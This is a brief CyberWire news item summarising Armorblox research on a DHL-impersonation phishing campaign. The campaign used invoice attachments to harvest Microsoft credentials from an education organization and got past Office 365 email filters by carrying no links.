Credential phishing campaign impersonates DHL.
the cyberwire logoJan 17, 2023

A credential-harvesting campaign uses DHL impersonation for social engineering.

Credential phishing campaign impersonates DHL.

Armorblox describes a phishing campaign that’s using phony shipping invoices that purport to come from DHL.

Attackers attempt to breach Microsoft accounts.

The campaign targeted an organization in the education industry with more than 100,000 emails:

“The body of the email continues to impersonate the well-known brand, through the inclusion of the company logo and brand colors and signature pertaining to the DLP customer service department. The email looks like a notification from DHL, notifying recipients about a parcel sent by a customer that needed to be rerouted to the correct delivery address. The body of the email has one simple call to action for the recipient, to view the attached document and confirm the destination address of the parcel shipment.”

The email contains an Excel document which, when opened, will display a blurred out preview of an invoice. The user will be asked to enter their Microsoft account login credentials in order to view the invoice.

Messages bypass security filters.

The researchers note that the emails were able to bypass email security filters since they didn’t contain any malicious links:

“The email attack used language as the main attack vector in order to bypass both Microsoft Office 365 and EOP email security controls. These native email security layers are able to block mass spam and phishing campaigns and known malware and bad URLs. However, this targeted email attack bypassed Microsoft email security because it did not include any bad URLs or links and included an HTML file that included a malicious phishing form.”